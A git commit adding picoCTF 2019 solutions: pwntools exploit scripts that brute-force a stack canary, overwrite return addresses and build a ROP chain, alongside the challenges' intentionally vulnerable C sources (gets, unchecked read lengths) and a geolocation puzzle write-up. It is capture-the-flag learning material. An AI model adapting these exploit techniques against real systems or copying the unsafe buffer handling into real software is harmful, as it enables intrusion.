[writeup] add picoctf 2019 (part)

Author: onealmond

README.md

@@ -7,3 +7,21 @@
 - [malvertising](google-ctf-2019/malvertising/writeup.md)
 - [MicroServiceDaemonOS](google-ctf-2019/MicroServiceDaemonOS/shellcode.py)
 - [dialtone](google-ctf-2019/dialtone/writeup.md)
+
+# picoctf 2019
+- [c0rrypt](picoctf-2019/c0rrupt/writeup.md)
+- [CanaRy](picoctf-2019/CanaRy/shellcode.py)
+- [overflow-0](picoctf-2019/overflow-0/shellcode.py)
+- [overflow-1](picoctf-2019/overflow-1/writeup.md)
+- [overflow-2](picoctf-2019/overflow-2/writeup.md)
+- [shark-on-wire1](picoctf-2019/shark-on-wire1/writeup.md)
+- [asm2](picoctf-2019/asm2/writeup.md)
+- [WhitePages](picoctf-2019/WhitePages/decode.py)
+- [Mr. WorldWide](picoctf-2019/Mr-WorldWide/writeup.md)
+- [caesar](picoctf-2019/caesar/decode.py)
+- [NewOverFlow-1](picoctf-2019/NewOverFlow-1/shellcode.py)
+- [NewOverFlow-2](picoctf-2019/NewOverFlow-2/shellcode.py)
+- [like1000](picoctf-2019/like1000/writeup.md)
+- [rot13](picoctf-2019/rot13/writeup.md)
+- [the numbers](picoctf-2019/the_numbers/writeup.md)
+- [rop32](picoctf-2019/rop32/shellcode.py)

picoctf-2019/CanaRy/shellcode.py

@@ -0,0 +1,48 @@
+import pwn
+
+remote_binary = "/problems/canary_2_dffbf795b4788666d54a993a5e41d145/vuln"
+
+BUF_LEN = 32
+KEY_LEN = 4
+
+def find_canary():
+    canary = b""
+    for l in range(KEY_LEN):
+        for c in range(256):
+            pr = pwn.process(remote_binary)
+            try:
+                pr.writelineafter("Please enter the length of the entry:\n> ", str(BUF_LEN + len(canary) + 1))
+                pr.writelineafter("Input>", b"A"*BUF_LEN + canary + pwn.p8(c))
+                line = pr.readline();
+                if "Stack Smashing Detected" in line:
+                    continue
+                canary += pwn.p8(c)
+                break
+            finally:
+                pr.close()
+    return canary
+
+def send_payload(canary, payload):
+    pr = pwn.process(remote_binary)
+    try:
+        pr.writelineafter("Please enter the length of the entry:\n> ", str(BUF_LEN + len(canary) + len(payload)))
+        pr.writeafter("Input>", "A"*BUF_LEN + canary.encode() + payload)
+        rsp = pr.readall(timeout=0.5)
+        return rsp
+    finally:
+        pr.close()
+
+def detect_segfault(canary):
+
+    ofs = 16
+    while True: 
+        #payload = pwn.fit({ofs: pwn.p16(pwn.ELF(remote_binary, False).sym["display_flag"])}, filler='B')
+        payload = b"A"*ofs + pwn.p16(pwn.ELF(remote_binary, False).sym["display_flag"])
+        rsp = send_payload(canary, payload)
+        if "pico" in rsp.lower():
+            print(rsp)
+            break
+
+canary = find_canary()
+print("canary:", canary)
+detect_segfault(canary)

picoctf-2019/CanaRy/vuln.c

@@ -0,0 +1,76 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <wchar.h>
+#include <locale.h>
+
+#define BUF_SIZE 32
+#define FLAG_LEN 64
+#define KEY_LEN 4
+
+void display_flag() {
+  char buf[FLAG_LEN];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("'flag.txt' missing in the current directory!\n");
+    exit(0);
+  }
+  fgets(buf,FLAG_LEN,f);
+  puts(buf);
+  fflush(stdout);
+}
+
+char key[KEY_LEN];
+void read_canary() {
+  FILE *f = fopen("/problems/canary_2_dffbf795b4788666d54a993a5e41d145/canary.txt","r");
+  if (f == NULL) {
+    printf("[ERROR]: Trying to Read Canary\n");
+    exit(0);
+  }
+  fread(key,sizeof(char),KEY_LEN,f);
+  fclose(f);
+}
+
+void vuln(){
+   char canary[KEY_LEN];
+   char buf[BUF_SIZE];
+   char user_len[BUF_SIZE];
+
+   int count;
+   int x = 0;
+   memcpy(canary,key,KEY_LEN);
+   printf("Please enter the length of the entry:\n> ");
+
+   while (x<BUF_SIZE) {
+      read(0,user_len+x,1);
+      if (user_len[x]=='\n') break;
+      x++;
+   }
+   sscanf(user_len,"%d",&count);
+
+   printf("Input> ");
+   read(0,buf,count);
+
+   if (memcmp(canary,key,KEY_LEN)) {
+      printf("*** Stack Smashing Detected *** : Canary Value Corrupt!\n");
+      exit(-1);
+   }
+   printf("Ok... Now Where's the Flag?\n");
+   fflush(stdout);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  int i;
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  read_canary();
+  vuln();
+
+  return 0;
+}

picoctf-2019/Mr-WorldWide/writeup.md

@@ -0,0 +1,26 @@
+We got list of float point numbers from the message. the challenge named Mr. Worldwide, guess this numbers represent latitude and longitude of location. 
+
+```
+[
+(35.028309, 135.753082)
+(46.469391, 30.740883)
+(39.758949, -84.191605)
+(41.015137, 28.979530)
+(24.466667, 54.366669)
+(3.140853, 101.693207)
+_
+(9.005401, 38.763611)
+(-3.989038, -79.203560)
+(52.377956, 4.897070)
+(41.085651, -73.858467)
+(57.790001, -152.407227)
+(31.205753, 29.924526)
+]
+```
+
+Look it up at [findlatitudeandlongitude](https://www.findlatitudeandlongitude.com), every tuple is a city on the map, we use the first letter of the city name
+. then we got the flag.
+
+```
+picoCTF{KODIAK_ALASKA}
+```

picoctf-2019/NewOverFlow-1/shellcode.py

@@ -0,0 +1,83 @@
+import pwn
+
+remote_binary = "/problems/newoverflow-1_4_3fc8f7e1553d8d36ded1be37c306f3a4/vuln"
+
+BUF_LEN = 64
+pr = pwn.process(remote_binary)
+
+
+def detect_segfault():
+
+    """
+    gdb ./vuln
+    ...
+    (gdb) r <<< $(python2 -c "import pwn;print(pwn.cyclic(128, n=8))")
+    ...
+    Program received signal SIGSEGV, Segmentation fault.
+    0x00000000004007e7 in vuln ()
+    ...
+    (gdb) info stack 
+    #0  0x00000000004007e7 in vuln ()
+    #1  0x616161616161616a in ?? ()
+    #2  0x616161616161616b in ?? ()
+    #3  0x616161616161616c in ?? ()
+    #4  0x616161616161616d in ?? ()
+    #5  0x616161616161616e in ?? ()
+    #6  0x616161616161616f in ?? ()
+    #7  0x6161616161616170 in ?? ()
+    #8  0x0000000000000000 in ?? ()
+    ...
+    
+    >>> pwn.cyclic_find(pwn.p64(0x616161616161616a),n=8)    
+    72
+    """
+    ofs = pwn.cyclic_find(pwn.p64(0x616161616161616a),n=8)
+
+    """
+    It doesn't show the flag with
+    ```
+    payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["flag"])
+    pr.writelineafter("Welcome to 64-bit. Give me a string that gets you the flag: \n", payload)
+    rsp = pr.readall(timeout=0.5)
+    ```
+
+    Lets' debug with a fake flag file.
+    $ echo "aaaflagaaa" > flag.txt
+
+    $ gdb /problems/newoverflow-1_4_3fc8f7e1553d8d36ded1be37c306f3a4/vuln
+    (gdb) r <<< $(python2 -c 'import pwn;print(b"A"*72+pwn.p64(pwn.ELF("/problems/newoverflow-1_4_3fc8f7e1553d8d36ded1be37c306f3a4/vuln",False).sym["flag"]))')
+    Starting program: /problems/newoverflow-1_4_3fc8f7e1553d8d36ded1be37c306f3a4/vuln <<< $(python2 -c 'import pwn;print(b"A"*72+pwn.p64(pwn.ELF("/problems/newoverflow-1_4_3fc8f7e1553d8d36ded1be37c306f3a4/vuln",False).sym["flag"]))')
+    /bin/bash: warning: command substitution: ignored null byte in input
+    Welcome to 64-bit. Give me a string that gets you the flag: 
+
+    Program received signal SIGSEGV, Segmentation fault.
+    buffered_vfprintf (s=s@entry=0x7fa4bdc17760 <_IO_2_1_stdout_>, format=format@entry=0x7ffde5d09c58 "aaaflagaaa\n", args=args@entry=0x7ffde5d09b78) at vfprintf.c:2314
+    2314    vfprintf.c: No such file or directory.
+    (gdb) disas
+    Dump of assembler code for function buffered_vfprintf:
+    ...
+       0x00007fa4bd8896e0 <+144>:   mov    %eax,0xa4(%rsp)
+       0x00007fa4bd8896e7 <+151>:   lea    0x389072(%rip),%rax        # 0x7fa4bdc12760 <_IO_helper_jumps>
+    => 0x00007fa4bd8896ee <+158>:   movaps %xmm0,0x50(%rsp)
+       0x00007fa4bd8896f3 <+163>:   mov    %rax,0x108(%rsp)
+    ...
+    There is a `movaps` instructions here, according to (x86 Instruction Set Reference MOVAPS)[https://c9x.me/x86/html/file_module_x86_id_180.html], the instruction is used for alignment.
+    > Moves a double quadword containing four packed single-precision floating-point values from the source operand (second operand) to the destination operand (first operand). This instruction can be used to load an XMM register from a 128-bit memory location, to store the contents of an XMM register into a 128-bit memory location, or to move data between two XMM registers.
+
+    When the source or destination operand is a memory operand, the operand must be aligned on a 16-byte boundary or a general-protection exception (#GP) is generated.
+
+
+    To solve this we need to call `main` again before jump to `flag`.
+    """
+    payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["main"])
+    pr.writelineafter("Welcome to 64-bit. Give me a string that gets you the flag: \n", payload)
+
+    payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["flag"])
+    pr.writelineafter("Welcome to 64-bit. Give me a string that gets you the flag: \n", payload)
+    rsp = pr.readall(timeout=0.5)
+
+    print('ofs:', ofs);print('rsp:', rsp)
+    if "pico" in rsp.lower():
+        print(rsp)
+
+detect_segfault()

picoctf-2019/NewOverFlow-1/vuln.c

@@ -0,0 +1,36 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFFSIZE 64
+#define FLAGSIZE 64
+
+void flag() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("'flag.txt' missing in the current directory!\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFFSIZE];
+  gets(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
+  vuln();
+  return 0;
+}
+

picoctf-2019/NewOverFlow-2/shellcode.py

@@ -0,0 +1,62 @@
+import os
+os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')
+
+import pwn
+
+remote_binary = "/problems/newoverflow-2_4_2cbec72146545064c6623c465faba84e/vuln"
+remote_binary = "./vuln"
+
+BUF_LEN = 64
+pr = pwn.process(remote_binary)
+
+def detect_segfault():
+    """
+    Input result of `pwn.cyclic(128,n=8)`, we got a segfault. By checking the stack, we have
+    (gdb) info stack
+    #0  0x00000000004008cd in vuln ()
+    #1  0x616161616161616a in ?? ()
+    #2  0x616161616161616b in ?? ()
+    #3  0x616161616161616c in ?? ()
+    #4  0x616161616161616d in ?? ()
+    #5  0x616161616161616e in ?? ()
+    #6  0x616161616161616f in ?? ()
+    #7  0x6161616161616170 in ?? ()
+    #8  0x0000000000000000 in ?? ()
+    """
+    ofs = pwn.cyclic_find(pwn.p64(0x616161616161616a),n=8) # 72
+
+    """
+    A trick due to old code haven't been removed
+
+    payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["main"])
+    pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload);
+
+    payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["flag"])
+    pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload);
+    """
+
+    for _ in range(0):
+        payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["main"])
+        pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload);
+
+    """
+    According to the conditions we need to make `win1` and `win2` true by calling `win_fn1` and `win_fn2` before `win_fn`
+    """
+    payload = b"A"*ofs + build_rop()
+    print("payload:\n", payload)
+    pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload);
+    rsp = pr.readall(timeout=0.5)
+
+    print('ofs:', ofs);print('rsp:', rsp)
+    if rsp and "pico" in rsp.decode().lower():
+        print(rsp)
+
+def build_rop():
+    rop = pwn.ROP(remote_binary)
+    rop.win_fn1(0xDEADBEEF)
+    rop.win_fn2(0xBAADCAFE,0xCAFEBABE,0xABADBABE)
+    rop.win_fn()
+
+    return rop.chain()
+
+detect_segfault()